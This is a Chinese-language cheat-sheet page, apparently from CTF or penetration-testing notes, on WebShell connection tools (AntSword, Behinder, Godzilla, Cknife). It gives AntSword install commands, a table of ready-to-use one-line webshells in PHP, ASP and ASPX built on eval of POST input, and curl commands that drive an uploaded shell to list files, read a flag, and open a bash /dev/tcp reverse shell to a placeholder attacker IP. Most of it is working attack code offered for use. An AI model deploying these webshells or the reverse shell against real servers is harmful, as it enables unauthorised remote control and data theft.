菜刀类工具 — 工具配置

“菜刀”是 WebShell 连接管理工具的统称,用于连接目标服务器上已上传的 WebShell 并执行文件管理、命令执行等操作。

工具对比

工具语言特点推荐程度
蚁剑(AntSword)多语言开源、模块化、编码器可定制、持续维护推荐
冰蝎(Behinder)Java/PHP/ASP加密通信、动态密钥、WAF 绕过强推荐
哥斯拉(Godzilla)Java/PHP/ASP功能最丰富、多种载荷类型推荐
中国菜刀(Cknife)多语言经典老牌、特征已被大量检测学习了解

蚁剑(AntSword)安装

# 下载源码
git clone https://github.com/AntSwordProject/antSword.git
 
# 下载加载器
wget https://github.com/AntSwordProject/AntSword-Loader/releases/download/4.0.3/AntSword-Loader-v4.0.3-linux-x64.zip
unzip AntSword-Loader-v4.0.3-linux-x64.zip

一句话木马类型速查

语言代码连接密码
PHP<?php @eval($_POST['cmd']); ?>cmd
PHP(加密)<?php eval(base64_decode($_POST['cmd'])); ?>cmd(带 base64 编码器)
ASP<%eval request("cmd")%>cmd
ASPX<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>cmd

终端无工具连接(curl 直连一句话)

# 不依赖任何图形工具,纯终端操作 WebShell
 
# 执行命令
curl -s -X POST "http://target.com/shell.php" \
 -d "cmd=system('ls -la /var/www/html');"
 
# 读取 flag
curl -s -X POST "http://target.com/shell.php" \
 -d "cmd=system('cat /flag');"
 
# 反弹 shell(先在本机启动监听 nc -lvp 4444)
curl -s -X POST "http://target.com/shell.php" \
 -d "cmd=system('bash -c \"exec bash -i &>/dev/tcp/攻击机IP/4444 <&1\"');"

关联教程

此文件夹下有0条笔记。